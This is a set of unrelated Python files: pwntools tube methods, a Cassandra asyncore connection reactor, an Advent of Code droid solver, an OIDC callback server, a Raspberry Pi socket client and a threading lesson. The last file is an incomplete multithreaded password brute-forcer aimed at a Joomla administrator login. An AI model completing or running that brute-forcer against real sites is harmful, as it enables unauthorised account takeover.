>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
data
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
                tube_a << tube_b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
                tube_a << tube_b << tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
        Shorthand for connecting tubes to each other.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
wait = wait_for_close
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv('data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
        Closes the tube for further reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print x
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send'))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print x
>>> t = tube()
>>> t.connected_raw = p
>>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send'))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
>>> t = tube()
>>> def p(x): print x
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
        Should raise ``exceptions.EOFError`` if it is unable to send any
        more because of a closed tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
#: Alias for :meth:`recv`
def read(self, *a, **kw): return self.recv(*a, **kw)
#: Alias for :meth:`recvpred`
def readpred(self, *a, **kw): return self.recvpred(*a, **kw)
#: Alias for :meth:`recvn`
def readn(self, *a, **kw): return self.recvn(*a, **kw)
#: Alias for :meth:`recvuntil`
def readuntil(self, *a, **kw): return self.recvuntil(*a, **kw)
#: Alias for :meth:`recvlines`
def readlines(self, *a, **kw): return self.recvlines(*a, **kw)
#: Alias for :meth:`recvline`
def readline(self, *a, **kw): return self.recvline(*a, **kw)
#: Alias for :meth:`recvline_pred`
def readline_pred(self, *a, **kw): return self.recvline_pred(*a, **kw)
#: Alias for :meth:`recvline_contains`
def readline_contains(self, *a, **kw): return self.recvline_contains(*a, **kw)
#: Alias for :meth:`recvline_startswith`
def readline_startswith(self, *a, **kw): return self.recvline_startswith(*a, **kw)
#: Alias for :meth:`recvline_endswith`
def readline_endswith(self, *a, **kw): return self.recvline_endswith(*a, **kw)
#: Alias for :meth:`recvregex`
def readregex(self, *a, **kw): return self.recvregex(*a, **kw)
#: Alias for :meth:`recvline_regex`
def readline_regex(self, *a, **kw): return self.recvline_regex(*a, **kw)
#: Alias for :meth:`recvrepeat`
def readrepeat(self, *a, **kw): return self.recvrepeat(*a, **kw)
#: Alias for :meth:`recvall`
def readall(self, *a, **kw): return self.recvall(*a, **kw)
#: Alias for :meth:`send`
def write(self, *a, **kw): return self.send(*a, **kw)
#: Alias for :meth:`sendline`
def writeline(self, *a, **kw): return self.sendline(*a, **kw)
#: Alias for :meth:`sendafter`
def writeafter(self, *a, **kw): return self.sendafter(*a, **kw)
#: Alias for :meth:`sendlineafter`
def writelineafter(self, *a, **kw): return self.sendlineafter(*a, **kw)
#: Alias for :meth:`sendthen`
def writethen(self, *a, **kw): return self.sendthen(*a, **kw)
#: Alias for :meth:`sendlinethen`
def writelinethen(self, *a, **kw): return self.sendlinethen(*a, **kw)
def p64(self, *a, **kw): return self.send(packing.p64(*a, **kw))
def p32(self, *a, **kw): return self.send(packing.p32(*a, **kw))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def p8(self, *a, **kw): return self.send(packing.p8(*a, **kw))
def pack(self, *a, **kw): return self.send(packing.pack(*a, **kw))
def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u32(self, *a, **kw): return packing.u32(self.recvn(4), *a, **kw)
def u16(self, *a, **kw): return packing.u16(self.recvn(2), *a, **kw)
def u8(self, *a, **kw): return packing.u8(self.recvn(1), *a, **kw)
def unpack(self, *a, **kw): return packing.unpack(self.recvn(context.bytes), *a, **kw)
def flat(self, *a, **kw): return self.send(packing.flat(*a,**kw))
def fit(self, *a, **kw): return self.send(packing.fit(*a, **kw))
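# Illustrative sketch (not from the original module): the p*/u* helpers above
# pack and unpack fixed-width integers through the tube via pwnlib's packing
# module. Assuming the default little-endian context, their wire format
# matches the plain struct calls below.
import struct

payload = struct.pack('<I', 0xdeadbeef)                # what t.p32(0xdeadbeef) sends
assert struct.unpack('<I', payload)[0] == 0xdeadbeef   # what t.u32() would return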
|
asyncorereactor.py
|
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import sys
from threading import Event, Lock, Thread
import weakref
from six.moves import range
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, EINVAL, EISCONN, errorcode
try:
from weakref import WeakSet
except ImportError:
from cassandra.util import WeakSet # noqa
import asyncore
try:
import ssl
except ImportError:
ssl = None # NOQA
from cassandra import OperationTimedOut
from cassandra.connection import (Connection, ConnectionShutdown,
ConnectionException, NONBLOCKING)
from cassandra.protocol import RegisterMessage
log = logging.getLogger(__name__)
def _cleanup(loop_weakref):
try:
loop = loop_weakref()
except ReferenceError:
return
loop._cleanup()
class AsyncoreLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop_lock = Lock()
self._started = False
self._shutdown = False
self._conns_lock = Lock()
self._conns = WeakSet()
self._thread = None
atexit.register(partial(_cleanup, weakref.ref(self)))
def maybe_start(self):
should_start = False
did_acquire = False
try:
did_acquire = self._loop_lock.acquire(False)
if did_acquire and not self._started:
self._started = True
should_start = True
finally:
if did_acquire:
self._loop_lock.release()
if should_start:
self._thread = Thread(target=self._run_loop, name="cassandra_driver_event_loop")
self._thread.daemon = True
self._thread.start()
def _run_loop(self):
log.debug("Starting asyncore event loop")
with self._loop_lock:
while True:
try:
asyncore.loop(timeout=0.001, use_poll=True, count=1000)
except Exception:
log.debug("Asyncore event loop stopped unexepectedly", exc_info=True)
break
if self._shutdown:
break
with self._conns_lock:
if len(self._conns) == 0:
break
self._started = False
log.debug("Asyncore event loop ended")
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
log.debug("Waiting for event loop thread to join...")
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def connection_created(self, connection):
with self._conns_lock:
self._conns.add(connection)
def connection_destroyed(self, connection):
with self._conns_lock:
self._conns.discard(connection)
class AsyncoreConnection(Connection, asyncore.dispatcher):
"""
An implementation of :class:`.Connection` that uses the ``asyncore``
module in the Python standard library for its event loop.
"""
_loop = None
_total_reqd_bytes = 0
_writable = False
_readable = False
@classmethod
def initialize_reactor(cls):
if not cls._loop:
cls._loop = AsyncoreLoop()
else:
current_pid = os.getpid()
if cls._loop._pid != current_pid:
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
cls._loop = AsyncoreLoop()
@classmethod
def handle_fork(cls):
if cls._loop:
cls._loop._cleanup()
cls._loop = None
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
asyncore.dispatcher.__init__(self)
self.connected_event = Event()
self._callbacks = {}
self.deque = deque()
self.deque_lock = Lock()
self._loop.connection_created(self)
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self.create_socket(af, socktype)
self.connect(sockaddr)
sockerr = None
break
except socket.error as err:
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror))
self.add_channel()
if self.sockopts:
for args in self.sockopts:
self.socket.setsockopt(*args)
self._writable = True
self._readable = True
# start the event loop if needed
self._loop.maybe_start()
def set_socket(self, sock):
# Overrides the same method in asyncore. We deliberately
# do not call add_channel() in this method so that we can call
# it later, after connect() has completed.
self.socket = sock
self._fileno = sock.fileno()
def create_socket(self, family, type):
# copied from asyncore, but with the line to set the socket in
# non-blocking mode removed (we will do that after connecting)
self.family_and_type = family, type
sock = socket.socket(family, type)
if self.ssl_options:
if not ssl:
raise Exception("This version of Python was not compiled with SSL support")
sock = ssl.wrap_socket(sock, **self.ssl_options)
self.set_socket(sock)
def connect(self, address):
# this is copied directly from asyncore.py, except that
# a timeout is set before connecting
self.connected = False
self.connecting = True
self.socket.settimeout(1.0)
err = self.socket.connect_ex(address)
if err in (EINPROGRESS, EALREADY, EWOULDBLOCK) \
or err == EINVAL and os.name in ('nt', 'ce'):
raise ConnectionException("Timed out connecting to %s" % (address[0]))
if err in (0, EISCONN):
self.addr = address
self.socket.setblocking(0)
self.handle_connect_event()
else:
raise socket.error(err, os.strerror(err))
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.host)
self._writable = False
self._readable = False
asyncore.dispatcher.close(self)
log.debug("Closed socket to %s", self.host)
self._loop.connection_destroyed(self)
if not self.is_defunct:
self.error_all_callbacks(
ConnectionShutdown("Connection to %s was closed" % self.host))
# don't leave in-progress operations hanging
self.connected_event.set()
def handle_connect(self):
self._send_options_message()
def handle_error(self):
self.defunct(sys.exc_info()[1])
def handle_close(self):
log.debug("Connection %s closed by server", self)
self.close()
def handle_write(self):
while True:
with self.deque_lock:
try:
next_msg = self.deque.popleft()
except IndexError:
self._writable = False
return
try:
sent = self.send(next_msg)
self._readable = True
except socket.error as err:
if (err.args[0] in NONBLOCKING):
with self.deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self.deque_lock:
self.deque.appendleft(next_msg[sent:])
if sent == 0:
return
def handle_read(self):
try:
while True:
buf = self.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] not in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
self.defunct(err)
return
elif err.args[0] not in NONBLOCKING:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
if not self._callbacks and not self.is_control_connection:
self._readable = False
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self.deque_lock:
self.deque.extend(chunks)
self._writable = True
def writable(self):
return self._writable
def readable(self):
return self._readable or (self.is_control_connection and not (self.is_defunct or self.is_closed))
def register_watcher(self, event_type, callback, register_timeout=None):
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]), timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()), timeout=register_timeout)
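# Illustrative sketch (not driver code): AsyncoreLoop.maybe_start() above uses
# a non-blocking lock acquire plus a "started" flag so that, among racing
# callers, exactly one spawns the event-loop thread. The same start-once
# pattern in isolation:
import threading

class StartOnce(object):
    def __init__(self):
        self._lock = threading.Lock()
        self._started = False

    def maybe_start(self, target):
        should_start = False
        if self._lock.acquire(False):      # never block a racing caller
            try:
                if not self._started:
                    self._started = True
                    should_start = True
            finally:
                self._lock.release()
        if should_start:
            t = threading.Thread(target=target)
            t.daemon = True
            t.start()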
|
1.py
|
#!/usr/bin/env python3
import intcode
import queue
import threading
import itertools
excluded_items = {
"giant electromagnet",
"molten lava",
"infinite loop",
"escape pod",
"photons"
}
directions = {
"east": "west",
"west": "east",
"south": "north",
"north": "south"
}
security_checkpoint = "Security Checkpoint"
def play(computer):
room = None
doors = []
items = []
while True:
text = computer.get_decoded_output()
if text is None:
return room, doors, items
print(text)
if text == "Command?":
return room, doors, items
if text.startswith("== "):
room = text.strip("= ")
elif text.startswith("- "):
x = text.strip("- ")
if x in directions:
doors.append(x)
else:
items.append(x)
def explore(computer, trace):
room, doors, items = play(computer)
if room in trace:
return []
trace.append(room)
moves = []
for item in items:
if item in excluded_items:
continue
command("take " + item, computer)
play(computer)
if room == security_checkpoint:
doors.remove("north")
for door in doors:
moves.append((room, door))
command(door, computer)
moves.extend(explore(computer, trace))
moves.append((room, directions[door]))
command(directions[door], computer)
play(computer)
return moves
def command(cmd, computer):
print(">>> " + cmd)
computer.input_text(cmd + "\n")
def goto(room, moves, computer):
for r, m in moves:
if r == room:
return
command(m, computer)
play(computer)
def spoof_identity(computer):
command("inv", computer)
_, _, items = play(computer)
for item in items:
command("drop " + item, computer)
play(computer)
item_combos = sum([list(itertools.combinations(items, i)) for i in range(1, len(items) + 1)], [])
for combo in item_combos:
for item in combo:
command("take " + item, computer)
play(computer)
command("north", computer)
room, _, _ = play(computer)
if room != security_checkpoint:
return
for item in combo:
command("drop " + item, computer)
play(computer)
def deploy_droid():
computer = intcode.Computer(intcode.load_program("input"), intcode.PipeIOHandler(queue.Queue(), queue.Queue()))
t = threading.Thread(target=computer.execute)
t.start()
moves = explore(computer, [])
goto(security_checkpoint, moves, computer)
spoof_identity(computer)
t.join()
deploy_droid()
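# Illustrative sketch (separate from the solution above): spoof_identity()
# enumerates every non-empty subset of the inventory with
# itertools.combinations; the subset generation on its own:
subset_items = ["coin", "mug", "hypercube"]
combos = [c for i in range(1, len(subset_items) + 1)
          for c in itertools.combinations(subset_items, i)]
assert len(combos) == 2 ** len(subset_items) - 1   # all non-empty subsets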
|
web.py
|
import os
from http.server import BaseHTTPRequestHandler, HTTPServer
from socket import AF_INET, SOCK_STREAM, gethostbyname, socket
from threading import Thread
from urllib.parse import parse_qs
from oic.oic import AccessTokenResponse, AuthorizationResponse, Client
from src.authentication.types import AuthenticationData
from src.cli import console
from src.context import ClickContext
CALLBACK_PORT_RANGE = range(44444, 44448)
def get_callback_port() -> int:
t_IP = gethostbyname("localhost")
for port in CALLBACK_PORT_RANGE:
conn = (s := socket(AF_INET, SOCK_STREAM)).connect_ex((t_IP, port))
s.close()
if conn:
break
else:
raise Exception("No port in the range 44444-44447 is available.")
return port
def run_callback_server(state: str, nonce: str, client: Client, ctx: ClickContext) -> int:
class CallbackHandler(BaseHTTPRequestHandler):
"""
        Handles the redirect from Keycloak after the web login.
        A simple HTTP server is started when the user is sent to the Keycloak
        web frontend to authenticate.
"""
def get_post_data(self) -> dict:
post_body = self.rfile.read(int(self.headers.get("content-length", 0)))
return {k.decode(): v[0].decode() for k, v in parse_qs(post_body).items()}
def send_text_response(self, response_body):
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(response_body)))
self.end_headers()
self.wfile.write(response_body)
def do_POST(self):
POST = self.get_post_data()
if POST["state"] != state:
raise Exception(f"Invalid state: {POST['state']}")
response = ctx.auth._get_requesting_party_token(POST["access_token"])
login_file = open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "login.html"))
text = login_file.read()
login_file.close()
# select response
if not response["success"]:
console.error("Login failed!")
text = (
"Login failed! Could not retrieve requesting party token. "
"Please try again or contact your System administrator"
)
else:
try:
token = ctx.auth.token_from_response(response)
except Exception as e:
console.debug(e)
console.debug(response)
console.error("Login failed!")
text = "Login failed! Your token does not match."
else:
ctx.auth.general_data.authentication = AuthenticationData(
email=token["email"],
access_token=response["response"]["access_token"],
refresh_token=response["response"]["refresh_token"],
requesting_party_token=True,
)
ctx.auth.local_storage_general.set(ctx.auth.general_data)
if given_name := token.get("given_name", ""):
greeting = f"Hello {given_name}!"
else:
greeting = "Hello!"
html_close = "close"
text_html = (
f"You have successfully logged in. You can {html_close} this browser tab and return "
f"to the shell."
)
text_plain = (
"You have successfully logged in. You can close this browser tab and return to the shell."
)
greeting_text = "{greeting} {text}".format(greeting=greeting, text=text_plain)
greeting_html = "{greeting} {text}".format(greeting=greeting, text=text_html)
text = text.replace("##text_placeholder##", greeting_html)
text = text.replace("##headline##", "Login Successful")
console.success(f"{greeting_text} You are now logged in!")
response_body = text.encode("utf-8")
self.send_text_response(response_body)
Thread(target=server.shutdown).start()
def log_request(self, *args, **kwargs):
return
port = get_callback_port()
server = HTTPServer(("", port), CallbackHandler)
Thread(target=server.serve_forever).start()
return port
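# Illustrative sketch (not part of the module): get_callback_port() above
# treats a non-zero connect_ex() result as "nothing is listening here, so the
# port is free". The same probe as a standalone helper:
from socket import AF_INET as _AF_INET, SOCK_STREAM as _SOCK_STREAM, socket as _socket

def port_is_free(host: str, port: int) -> bool:
    s = _socket(_AF_INET, _SOCK_STREAM)
    try:
        return s.connect_ex((host, port)) != 0   # errno != 0 -> no listener
    finally:
        s.close()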
|
connection.py
|
"""
Connection module for exchanging data with the Raspberry Pi.
"""
from socket import socket, SHUT_RDWR
from multiprocessing import Process
from threading import Thread
import msgpack
from msgpack import UnpackException
from ..constants.networking import CONNECTION_IP, CONNECTION_PORT, CONNECTION_DATA_SIZE
from ..constants.athena import RK_CONNECTION_SURFACE_PI
from ..utils import logger
from ..athena import DataManager
from ..exceptions import NetworkingException
from ..enums import ConnectionStatus
# noinspection PyMethodParameters
class Connection:
"""
    Communicate with the Raspberry Pi by establishing a 2-way data exchange over TCP.
A connection is a non-enforced singleton featuring the following functionalities:
- set and retrieve connection status
- network data using a socket
- connect to the server in a non-blocking manner
- communicate with the server in a separate process
- clean up resources
Upon the communication process ending, the `IDLE` connection status will be set. The calling code must then handle
this scenario, for example by `reconnect`-ing.
"""
def __init__(self):
self._ip = CONNECTION_IP
self._port = CONNECTION_PORT
self._data_size = CONNECTION_DATA_SIZE
self._address = self._ip, self._port
self._socket = self._new_socket()
self._communication_process = self._new_process()
@property
def status(self) -> ConnectionStatus:
"""
Retrieve current connection's state (process-independent).
"""
return ConnectionStatus(DataManager.connections[RK_CONNECTION_SURFACE_PI])
@status.setter
def status(self, value: ConnectionStatus):
"""
Set the connection's state (process-independent).
"""
# pylint: disable = no-self-use
DataManager.connections[RK_CONNECTION_SURFACE_PI] = value.value
@staticmethod
def _new_socket() -> socket:
"""
Build a new socket needed for networking purposes.
"""
return socket()
def _new_process(self) -> Process:
"""
        Create a new process needed for making communication a non-blocking, efficient operation.
"""
return Process(target=self._communicate)
def connect(self):
"""
Connect to the server.
Runs all connection methods in a separate thread, to avoid hanging the main thread on the blocking operations.
"""
Thread(target=self._connect_threaded).start()
def _connect_threaded(self):
"""
Connect to the server and start the communication process.
Connection may only happen if the client is currently disconnected.
Connection failures are silent and will not cause any global exceptions to be raised.
"""
if self.status != ConnectionStatus.DISCONNECTED:
logger.warning(f"Can't connect to {self._ip}:{self._port} - not disconnected (status is {self.status})")
return
logger.info(f"Connecting to {self._ip}:{self._port}")
self.status = ConnectionStatus.CONNECTING
try:
self._socket.connect(self._address)
self._communication_process.start()
self.status = ConnectionStatus.CONNECTED
logger.info(f"Connected to {self._ip}:{self._port}")
except OSError:
logger.exception("Failed to connect safely")
self.status = ConnectionStatus.DISCONNECTED
self._cleanup(ignore_errors=True)
def _communicate(self):
"""
Exchange data with the server.
Within the loop, the client sends the data first, and then waits for a response. Once the loop is exited, the
`IDLE` status is set, and the calling code must detect and handle this on their own.
"""
while True:
try:
# Send the data to the server and retrieve immediately after (2-way-communication)
self._socket.sendall(msgpack.packb(DataManager.transmission.all()))
received_data = self._socket.recv(self._data_size)
# Exit if connection closed by server
if not received_data:
logger.info(f"Communication with {self._ip}:{self._port} ended by the server")
break
# Quit on any incorrectly formatted data
try:
received_data = msgpack.unpackb(received_data)
except UnpackException:
logger.exception(f"Failed to unpack the following data: {received_data}")
break
# Only handle valid, non-empty data
if received_data and isinstance(received_data, dict):
DataManager.received.update(received_data)
except (UnpackException, OSError):
logger.exception("An error occurred while communicating with the server")
break
# Once the communication has ended, the IDLE status will be set - should be detected and handled by the caller
self.status = ConnectionStatus.IDLE
def disconnect(self):
"""
        Disconnect from the server.
Disconnection may only happen if the client is connected or idle.
Disconnection failures are silent and will not cause any global exceptions to be raised.
The `DISCONNECTED` status will always be set, regardless of whether the connection has been shut down properly
or not. This is to avoid the client being unable to connect again in case of non-handled issues.
"""
if self.status != ConnectionStatus.CONNECTED and self.status != ConnectionStatus.IDLE:
logger.warning(f"Can't disconnect from {self._ip}:{self._port} - not connected or idle "
f"(status is {self.status})")
return
logger.info(f"Disconnecting from {self._ip}:{self._port}")
self.status = ConnectionStatus.DISCONNECTING
try:
self._cleanup()
logger.info(f"Disconnected from {self._ip}:{self._port}")
except OSError:
logger.exception("Failed to disconnect safely")
self._cleanup(ignore_errors=True)
# Set the disconnected status regardless of what happened above, to avoid deadlocking
self.status = ConnectionStatus.DISCONNECTED
def _cleanup(self, ignore_errors: bool = False):
"""
Stop all components as well as recreate the socket and the communication process.
"""
try:
if self._communication_process.is_alive():
self._communication_process.terminate()
self._communication_process = self._new_process()
self._socket.shutdown(SHUT_RDWR)
self._socket.close()
self._socket = self._new_socket()
except OSError as ex:
if ignore_errors:
logger.debug(f"Ignoring connection cleanup error - {ex}")
else:
raise NetworkingException("Failed to cleanup the connection") from ex
def reconnect(self):
"""
Disconnect and connect again.
"""
logger.info(f"Reconnecting to {self._ip}:{self._port}")
self.disconnect()
self.connect()
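# Illustrative sketch (hypothetical caller, not part of this module): the
# class docstring states that once the communication process ends, the IDLE
# status is set and the caller must react, e.g. by reconnecting. A minimal
# supervision loop over an existing Connection instance might look like this;
# the poll interval is an assumption.
import time


def supervise(connection, poll_interval=1.0):
    """Reconnect whenever the communication process goes idle."""
    connection.connect()
    while True:
        if connection.status == ConnectionStatus.IDLE:
            connection.reconnect()
        time.sleep(poll_interval)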
|
Lesson15.py
|
# Python multithreading:
import threading ,time ,random
# Run a polling loop in a child thread
def loop():
    # Show the current thread's name
print("current thread name: %s"%threading.current_thread().name)
n = 0
while n<5:
print("thread %s ==> %s"%(threading.current_thread().name,n))
n+=1
time.sleep(1)
print("child thread is finished !!")
pass
if __name__ == '__main__':
    # Print the main thread's name
print("main tread name %s"%threading.current_thread().name)
    # Create the child thread
t =threading.Thread(target=loop,name="LoopThread")
t.start()
    # Wait for the child thread to finish
t.join()
pass
"线程同步"
def change_it(n):
    # Deposit first, then withdraw; the result should be 0:
global balance
balance = balance + n
balance = balance - n
balance = 0
lock =threading.Lock()
def run_thread(n):
for i in range(100):
lock.acquire()
try:
print("current thread",threading.current_thread().name)
change_it(n)
finally:
lock.release()
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
"""
当多个线程同时执行lock.acquire()时,只有一个线程能成功地获取锁,然后继续执行代码,其他线程就继续等待直到获得锁为止。
获得锁的线程用完后一定要释放锁,否则那些苦苦等待锁的线程将永远等待下去,成为死线程。
##所以我们用try...finally来确保锁一定会被释放。
锁的好处就是确保了某段关键代码只能由一个线程从头到尾完整地执行,坏处当然也很多,首先是阻止了多线程并发执行,
包含锁的某段代码实际上只能以单线程模式执行,效率就大大地下降了。其次,由于可以存在多个锁,不同的线程持有不同的锁,
并试图获取对方持有的锁时,可能会造成死锁,导致多个线程全部挂起,既不能执行,也无法结束,只能靠操作系统强制终止。
"""
|
joomla_killer.py
|
import http.cookiejar
import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
from abc import ABC #Abstract Base Classes
from html.parser import HTMLParser
# global settings
user_thread = 10
username = "admin"
wordlist_file = "cain.txt"
resume = None
# target settings
# start from a local testing installation before going into the wild
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field = "username"
password_field = "pswd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser, ABC):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            tag_name = None
            tag_value = None
            for name, value in attrs:
                if name == "name":
                    tag_name = value
                if name == "value":
                    tag_value = value
            if tag_name:
                self.tag_results[tag_name] = tag_value
class Bruter(object):
def __init__(self, user, words_q):
self.username = user
self.password_q = words_q
self.found = False
print(f"Finished setting up for: {user}")
def run_bruteforce(self):
for thread in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = http.cookiejar.FileCookieJar("cookies")
